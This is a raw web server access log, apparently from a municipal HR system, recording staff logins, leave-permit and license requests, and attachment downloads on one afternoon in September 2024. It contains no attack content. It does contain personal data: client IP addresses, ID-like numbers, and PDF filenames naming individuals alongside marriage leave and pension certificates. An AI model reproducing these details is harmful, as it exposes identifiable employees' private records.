190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1733
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
190.171.153.34 - - [30/Sep/2024:17:08:41 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
190.171.154.42 - - [30/Sep/2024:17:09:04 -0300] "GET /cormun/servlet/permisogoce?302cc421197dda5923e3deceb4b069a04a4fea2e0b68b3dba27ac4bbd0ad138ee912af5f9afebf3bf8a1ed3a0ea2ae1f5638ecffab8a342a63d9ca5b7a97d072,gx-no-cache=1727726909308 HTTP/1.1" 200 77
190.171.154.42 - - [30/Sep/2024:17:09:04 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.154.42 - - [30/Sep/2024:17:09:17 -0300] "GET /cormun/servlet/permisogoce?302cc421197dda5923e3deceb4b069a02c9f38336049df045a9ead4c3520d0d8938c777b22e0cecfbfb2ef51b1d57d4d552295e4785898dbca46a55045287306,gx-no-cache=1727726922278 HTTP/1.1" 200 48
190.171.153.26 - - [30/Sep/2024:17:11:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1738
190.171.154.42 - - [30/Sep/2024:17:11:20 -0300] "POST /cormun/servlet/permisogoce?ca18625f8b500d55fca799d37dde08b0,INS,0,,,,gx-no-cache=1727727044742 HTTP/1.1" 200 93
190.171.154.42 - - [30/Sep/2024:17:11:20 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
190.171.154.42 - - [30/Sep/2024:17:11:20 -0300] "GET /cormun/static/gxcfg.js?20221129846035 HTTP/1.1" 200 953
190.171.154.42 - - [30/Sep/2024:17:11:20 -0300] "GET /cormun/static/hpexe_return.js?20221129846037 HTTP/1.1" 200 1633
190.171.154.42 - - [30/Sep/2024:17:11:20 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10424
190.171.141.90 - - [30/Sep/2024:17:11:29 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727054439 HTTP/1.1" 200 12586
190.171.154.42 - - [30/Sep/2024:17:12:53 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6740
190.171.141.114 - - [30/Sep/2024:17:13:09 -0300] "POST /cormun/servlet/permisosadjuntos?aab30c1de5a753f89c3c81e6e3bbc42f,INS,11274732,P,20240926111253,, HTTP/1.1" 200 116
190.171.141.114 - - [30/Sep/2024:17:13:09 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.141.114 - - [30/Sep/2024:17:13:10 -0300] "GET /cormun/servlet/trpermisosadjuntos?11274732,20240926111253,P, HTTP/1.1" 200 6819
190.171.153.26 - - [30/Sep/2024:17:13:12 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.154.42 - - [30/Sep/2024:17:13:13 -0300] "GET /cormun/servlet/permisogoce?302cc421197dda5923e3deceb4b069a04a4fea2e0b68b3dba27ac4bbd0ad138ee912af5f9afebf3bf8a1ed3a0ea2ae1f5638ecffab8a342a63d9ca5b7a97d072,gx-no-cache=1727727157967 HTTP/1.1" 200 80
190.171.153.26 - - [30/Sep/2024:17:13:20 -0300] "POST /cormun/servlet/hlogin?ba0b1502018485f5960f7f796354b0dc,gx-no-cache=1727727164016 HTTP/1.1" 200 90
190.171.153.26 - - [30/Sep/2024:17:13:20 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 947
190.171.153.26 - - [30/Sep/2024:17:13:20 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4288
190.171.153.26 - - [30/Sep/2024:17:13:23 -0300] "GET /cormun/servlet/trautorizarsolicitud? HTTP/1.1" 200 8833
190.171.153.26 - - [30/Sep/2024:17:13:23 -0300] "GET /cormun//static/Resources/PXToolsActionView.png HTTP/1.1" 200 398
190.171.153.26 - - [30/Sep/2024:17:13:23 -0300] "GET /cormun//static/Resources/PXToolsRemoveAllAction.png HTTP/1.1" 200 487
190.171.153.26 - - [30/Sep/2024:17:13:23 -0300] "GET /cormun//static/Resources/PXToolsGridUpdate.png HTTP/1.1" 200 470
190.171.154.42 - - [30/Sep/2024:17:13:26 -0300] "GET /cormun/servlet/permisogoce?302cc421197dda5923e3deceb4b069a02c9f38336049df045a9ead4c3520d0d8c711feb88ddd8734a6f253aa7b291b0d552295e4785898dbca46a55045287306,gx-no-cache=1727727171702 HTTP/1.1" 200 48
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "POST /cormun/servlet/trautorizarsolicitud?ba0b1502018485f5960f7f796354b0dc,,gx-no-cache=1727727174573 HTTP/1.1" 200 4784
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.153.26 - - [30/Sep/2024:17:13:30 -0300] "POST /cormun/servlet/trautorizarsolicitud?ba0b1502018485f5960f7f796354b0dc,,gx-no-cache=1727727174730 HTTP/1.1" 200 4526
190.171.153.26 - - [30/Sep/2024:17:13:37 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10847
190.171.154.42 - - [30/Sep/2024:17:13:46 -0300] "POST /cormun/servlet/permisogoce?ca18625f8b500d55fca799d37dde08b0,INS,0,,,,gx-no-cache=1727727191241 HTTP/1.1" 200 93
190.171.154.42 - - [30/Sep/2024:17:13:46 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
190.171.154.42 - - [30/Sep/2024:17:13:46 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10624
190.171.154.42 - - [30/Sep/2024:17:13:57 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6201
190.171.154.42 - - [30/Sep/2024:17:13:57 -0300] "GET /cormun/static/gxcfg.js?2020121641683 HTTP/1.1" 200 953
190.171.154.42 - - [30/Sep/2024:17:13:57 -0300] "GET /cormun/static/trpermisosadjuntos.js?2020121642996 HTTP/1.1" 200 20158
190.171.154.42 - - [30/Sep/2024:17:14:00 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18042337,P,20240930170757,, HTTP/1.1" 200 5524
190.171.154.42 - - [30/Sep/2024:17:14:00 -0300] "GET /cormun/static/gxcfg.js?20201215134212 HTTP/1.1" 200 953
190.171.154.42 - - [30/Sep/2024:17:14:00 -0300] "GET /cormun/static/permisosadjuntos.js?20201215134285 HTTP/1.1" 200 8724
190.171.154.42 - - [30/Sep/2024:17:14:00 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.141.138 - - [30/Sep/2024:17:14:05 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1722
190.171.141.114 - - [30/Sep/2024:17:14:05 -0300] "POST /cormun/servlet/trpermisosadjuntos?aab30c1de5a753f89c3c81e6e3bbc42f,11274732,20240926111253,P,,gx-no-cache=1727727210518 HTTP/1.1" 200 90
190.171.141.114 - - [30/Sep/2024:17:14:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
190.171.141.114 - - [30/Sep/2024:17:14:06 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1727725773892 HTTP/1.1" 200 10710
190.171.141.138 - - [30/Sep/2024:17:14:08 -0300] "POST /cormun/servlet/hlogin?9a99ea1a8213a4dc29d13761bb84fef9,gx-no-cache=1727727213077 HTTP/1.1" 200 90
190.171.141.138 - - [30/Sep/2024:17:14:08 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 959
190.171.141.138 - - [30/Sep/2024:17:14:08 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 14054
190.171.141.114 - - [30/Sep/2024:17:14:10 -0300] "POST /cormun/servlet/trpermisosgoce?aab30c1de5a753f89c3c81e6e3bbc42f,gx-no-cache=1727725773892,gx-no-cache=1727727214622 HTTP/1.1" 200 7962
190.171.154.42 - - [30/Sep/2024:17:14:13 -0300] "POST /cormun/servlet/permisosadjuntos?ca18625f8b500d55fca799d37dde08b0,INS,18042337,P,20240930170757,, HTTP/1.1" 200 116
190.171.154.42 - - [30/Sep/2024:17:14:13 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.154.42 - - [30/Sep/2024:17:14:13 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6704
190.171.141.114 - - [30/Sep/2024:17:14:15 -0300] "GET /cormun/servlet/trpermisosadjuntos?20027836,20240927122638,P, HTTP/1.1" 200 6344
190.171.141.138 - - [30/Sep/2024:17:14:15 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15487
190.171.154.42 - - [30/Sep/2024:17:14:16 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930170757,P,,gx-no-cache=1727727221442 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:14:16 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
190.171.154.42 - - [30/Sep/2024:17:14:16 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10621
190.171.141.138 - - [30/Sep/2024:17:14:20 -0300] "GET /cormun/servlet/licenciaspermisos?DSP,11009696,L,20240927000000, HTTP/1.1" 200 7614
190.171.141.138 - - [30/Sep/2024:17:14:20 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
190.171.141.138 - - [30/Sep/2024:17:14:20 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
190.171.154.42 - - [30/Sep/2024:17:14:22 -0300] "POST /cormun/servlet/trpermisosgoce?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727227765 HTTP/1.1" 200 7988
190.171.154.42 - - [30/Sep/2024:17:14:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.154.42 - - [30/Sep/2024:17:14:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.154.42 - - [30/Sep/2024:17:14:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.154.42 - - [30/Sep/2024:17:14:22 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.154.42 - - [30/Sep/2024:17:14:31 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10544
190.171.154.42 - - [30/Sep/2024:17:14:38 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6700
190.171.154.42 - - [30/Sep/2024:17:14:43 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930170757,P,,gx-no-cache=1727727248767 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:14:43 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
190.171.154.42 - - [30/Sep/2024:17:14:43 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10545
190.171.154.42 - - [30/Sep/2024:17:14:49 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 6201
190.171.154.42 - - [30/Sep/2024:17:14:51 -0300] "GET /cormun/servlet/permisosadjuntos?INS,18042337,P,20240930171230,, HTTP/1.1" 200 5521
190.171.154.42 - - [30/Sep/2024:17:14:51 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
190.171.154.42 - - [30/Sep/2024:17:14:58 -0300] "POST /cormun/servlet/permisosadjuntos?ca18625f8b500d55fca799d37dde08b0,INS,18042337,P,20240930171230,, HTTP/1.1" 200 116
190.171.154.42 - - [30/Sep/2024:17:14:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.154.42 - - [30/Sep/2024:17:14:58 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 6700
190.171.154.42 - - [30/Sep/2024:17:15:00 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930171230,P,,gx-no-cache=1727727265624 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:15:00 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
190.171.154.42 - - [30/Sep/2024:17:15:00 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10545
190.171.154.42 - - [30/Sep/2024:17:15:07 -0300] "POST /cormun/servlet/trpermisosgoce?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727272530 HTTP/1.1" 200 7978
190.171.154.42 - - [30/Sep/2024:17:15:15 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 6697
190.171.154.42 - - [30/Sep/2024:17:15:18 -0300] "GET /cormun/PublicTempStorage/permiso_jorge_maldaonado_matrimonio8903874.pdf HTTP/1.1" 200 175631
190.171.154.42 - - [30/Sep/2024:17:15:36 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.154.42 - - [30/Sep/2024:17:15:42 -0300] "POST /cormun/servlet/hlogin?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727307813 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:15:42 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 983
190.171.154.42 - - [30/Sep/2024:17:15:42 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 6698
190.171.154.42 - - [30/Sep/2024:17:15:47 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930171230,P,,gx-no-cache=1727727312656 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:15:47 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1003
190.171.154.42 - - [30/Sep/2024:17:15:47 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1727727272530 HTTP/1.1" 200 10545
190.171.154.42 - - [30/Sep/2024:17:15:55 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6720
190.171.154.42 - - [30/Sep/2024:17:16:02 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1719
190.171.154.42 - - [30/Sep/2024:17:16:12 -0300] "POST /cormun/servlet/hlogin?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727337224 HTTP/1.1" 200 429
10.40.40.2 - - [30/Sep/2024:17:16:16 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 11139
190.171.141.114 - - [30/Sep/2024:17:16:20 -0300] "GET /cormun/servlet/permisosadjuntos?INS,20027836,P,20240927122638,, HTTP/1.1" 200 5645
190.171.141.114 - - [30/Sep/2024:17:16:20 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
10.40.40.2 - - [30/Sep/2024:17:16:23 -0300] "POST /cormun/servlet/trsolicitudgral?d91189e492caae02c7b2630fb2ec1158,,gx-no-cache=1727727383401 HTTP/1.1" 200 7641
10.40.40.2 - - [30/Sep/2024:17:16:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
10.40.40.2 - - [30/Sep/2024:17:16:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
10.40.40.2 - - [30/Sep/2024:17:16:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
10.40.40.2 - - [30/Sep/2024:17:16:23 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.154.42 - - [30/Sep/2024:17:16:26 -0300] "POST /cormun/servlet/hlogin?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727351154 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:16:26 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.154.42 - - [30/Sep/2024:17:16:26 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4155
190.171.154.42 - - [30/Sep/2024:17:16:35 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 10854
190.171.141.114 - - [30/Sep/2024:17:16:37 -0300] "POST /cormun/servlet/permisosadjuntos?aab30c1de5a753f89c3c81e6e3bbc42f,INS,20027836,P,20240927122638,, HTTP/1.1" 200 116
190.171.141.114 - - [30/Sep/2024:17:16:37 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1037
190.171.141.114 - - [30/Sep/2024:17:16:37 -0300] "GET /cormun/servlet/trpermisosadjuntos?20027836,20240927122638,P, HTTP/1.1" 200 6796
190.171.141.114 - - [30/Sep/2024:17:16:39 -0300] "POST /cormun/servlet/trpermisosadjuntos?aab30c1de5a753f89c3c81e6e3bbc42f,20027836,20240927122638,P,,gx-no-cache=1727727363976 HTTP/1.1" 200 90
190.171.141.114 - - [30/Sep/2024:17:16:39 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
190.171.141.114 - - [30/Sep/2024:17:16:39 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1727725773892 HTTP/1.1" 200 10704
4.151.229.13 - - [30/Sep/2024:17:16:42 -0300] "GET / HTTP/1.1" 200 11217
190.171.141.114 - - [30/Sep/2024:17:16:42 -0300] "POST /cormun/servlet/trpermisosgoce?aab30c1de5a753f89c3c81e6e3bbc42f,gx-no-cache=1727725773892,gx-no-cache=1727727367118 HTTP/1.1" 200 7902
190.171.154.42 - - [30/Sep/2024:17:16:44 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 8058
190.171.154.42 - - [30/Sep/2024:17:16:44 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
190.171.154.42 - - [30/Sep/2024:17:16:44 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
190.171.154.42 - - [30/Sep/2024:17:16:51 -0300] "POST /cormun/servlet/trautorizarpermisogoce?ca18625f8b500d55fca799d37dde08b0,,gx-no-cache=1727727375975 HTTP/1.1" 200 4532
190.171.154.42 - - [30/Sep/2024:17:16:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
190.171.154.42 - - [30/Sep/2024:17:16:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
190.171.154.42 - - [30/Sep/2024:17:16:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
190.171.154.42 - - [30/Sep/2024:17:16:51 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
190.171.154.42 - - [30/Sep/2024:17:16:55 -0300] "POST /cormun/servlet/trautorizarpermisogoce?ca18625f8b500d55fca799d37dde08b0,,gx-no-cache=1727727380073 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:16:55 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 964
190.171.154.42 - - [30/Sep/2024:17:16:55 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 10845
190.171.154.42 - - [30/Sep/2024:17:17:01 -0300] "POST /cormun/servlet/trpermisosgoce?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727386205 HTTP/1.1" 200 8262
190.171.141.114 - - [30/Sep/2024:17:17:02 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1760
190.171.154.42 - - [30/Sep/2024:17:17:04 -0300] "POST /cormun/servlet/trpermisosgoce?ca18625f8b500d55fca799d37dde08b0,gx-no-cache=1727727389068 HTTP/1.1" 200 8261
190.171.154.42 - - [30/Sep/2024:17:17:04 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 6993
190.171.141.114 - - [30/Sep/2024:17:17:05 -0300] "POST /cormun/servlet/hlogin?aab30c1de5a753f89c3c81e6e3bbc42f,gx-no-cache=1727727390058 HTTP/1.1" 200 90
190.171.141.114 - - [30/Sep/2024:17:17:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.141.114 - - [30/Sep/2024:17:17:05 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4311
190.171.141.90 - - [30/Sep/2024:17:17:06 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727391405 HTTP/1.1" 200 12586
190.171.154.42 - - [30/Sep/2024:17:17:07 -0300] "GET /cormun/PublicTempStorage/permiso_administrativo_jorge_maldaonado7072238.pdf HTTP/1.1" 200 174296
190.171.141.90 - - [30/Sep/2024:17:17:08 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727393022 HTTP/1.1" 200 12589
190.171.141.90 - - [30/Sep/2024:17:17:10 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727394983 HTTP/1.1" 200 12588
190.171.141.90 - - [30/Sep/2024:17:17:11 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727396574 HTTP/1.1" 200 12587
190.171.141.90 - - [30/Sep/2024:17:17:14 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727399293 HTTP/1.1" 200 12588
190.171.141.90 - - [30/Sep/2024:17:17:17 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727402327 HTTP/1.1" 200 12592
190.171.141.90 - - [30/Sep/2024:17:17:19 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727403999 HTTP/1.1" 200 12592
190.171.141.90 - - [30/Sep/2024:17:17:22 -0300] "POST /cormun/servlet/trlicencias?bbcc00978a402be0d6c51e62e8b92768,gx-no-cache=1727727406734 HTTP/1.1" 200 12592
10.40.40.2 - - [30/Sep/2024:17:17:52 -0300] "GET /cormun/servlet/trautorizarot? HTTP/1.1" 200 9592
190.171.141.114 - - [30/Sep/2024:17:17:56 -0300] "GET /cormun/servlet/trautorizarpermisogoce? HTTP/1.1" 200 9581
190.171.141.114 - - [30/Sep/2024:17:17:56 -0300] "GET /cormun/static/gxcfg.js?2020121645532 HTTP/1.1" 200 953
190.171.141.114 - - [30/Sep/2024:17:17:56 -0300] "GET /cormun/static/trautorizarpermisogoce.js?2020121651492 HTTP/1.1" 200 34948
10.40.40.2 - - [30/Sep/2024:17:17:58 -0300] "POST /cormun/servlet/trautorizarot?d91189e492caae02c7b2630fb2ec1158,,gx-no-cache=1727727478425 HTTP/1.1" 200 5351
190.171.141.114 - - [30/Sep/2024:17:18:13 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727457662 HTTP/1.1" 200 6667
190.171.141.114 - - [30/Sep/2024:17:18:13 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727458437 HTTP/1.1" 200 6416
190.171.141.114 - - [30/Sep/2024:17:18:14 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727459164 HTTP/1.1" 200 6190
190.171.141.114 - - [30/Sep/2024:17:18:15 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727459556 HTTP/1.1" 200 5803
190.171.141.114 - - [30/Sep/2024:17:18:15 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727459892 HTTP/1.1" 200 5555
190.171.141.114 - - [30/Sep/2024:17:18:15 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727460244 HTTP/1.1" 200 5276
190.171.141.114 - - [30/Sep/2024:17:18:18 -0300] "POST /cormun/servlet/trautorizarpermisogoce?aab30c1de5a753f89c3c81e6e3bbc42f,,gx-no-cache=1727727463437 HTTP/1.1" 200 4522
10.40.40.2 - - [30/Sep/2024:17:18:54 -0300] "GET /cormun/servlet/trsolicitudgral? HTTP/1.1" 200 10672
10.40.40.2 - - [30/Sep/2024:17:18:59 -0300] "POST /cormun/servlet/trsolicitudgral?d91189e492caae02c7b2630fb2ec1158,,gx-no-cache=1727727539318 HTTP/1.1" 200 6664
10.40.40.2 - - [30/Sep/2024:17:19:01 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21787,, HTTP/1.1" 200 8429
10.40.40.2 - - [30/Sep/2024:17:19:01 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
190.171.154.42 - - [30/Sep/2024:17:19:29 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930170757,P,,gx-no-cache=1727727534247 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:19:29 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
190.171.154.42 - - [30/Sep/2024:17:19:29 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1727727389068 HTTP/1.1" 200 10845
190.171.154.42 - - [30/Sep/2024:17:19:35 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 7010
190.171.154.42 - - [30/Sep/2024:17:19:37 -0300] "GET /cormun/PublicTempStorage/permiso_jorge_maldaonado_matrimonio5826547.pdf HTTP/1.1" 200 175631
190.171.154.42 - - [30/Sep/2024:17:19:46 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930171230,P, HTTP/1.1" 200 7010
190.171.154.42 - - [30/Sep/2024:17:19:51 -0300] "POST /cormun/servlet/trpermisosadjuntos?ca18625f8b500d55fca799d37dde08b0,18042337,20240930171230,P,,gx-no-cache=1727727556948 HTTP/1.1" 200 90
190.171.154.42 - - [30/Sep/2024:17:19:52 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 1004
190.171.154.42 - - [30/Sep/2024:17:19:52 -0300] "GET /cormun/servlet/trpermisosgoce?gx-no-cache=1727727389068 HTTP/1.1" 200 10845
10.40.40.2 - - [30/Sep/2024:17:19:52 -0300] "GET /cormun/servlet/vesolicitudgral?2024,21787,,SolicitudOTAdjuntos HTTP/1.1" 200 11232
10.40.40.2 - - [30/Sep/2024:17:19:52 -0300] "GET /cormun/pexe_scrolldiv.js HTTP/1.1" 404 1009
10.40.40.2 - - [30/Sep/2024:17:19:53 -0300] "POST /cormun/servlet/acontrolpreferencessavestate?None,RRHH+DANIELA,true HTTP/1.1" 200 35
10.40.40.2 - - [30/Sep/2024:17:19:54 -0300] "GET /cormun/PublicTempStorage/certificado_afp_natalia_%F1anco7829104.pdf HTTP/1.1" 200 76037
190.171.154.42 - - [30/Sep/2024:17:19:56 -0300] "GET /cormun/servlet/trpermisosadjuntos?18042337,20240930170757,P, HTTP/1.1" 200 7016
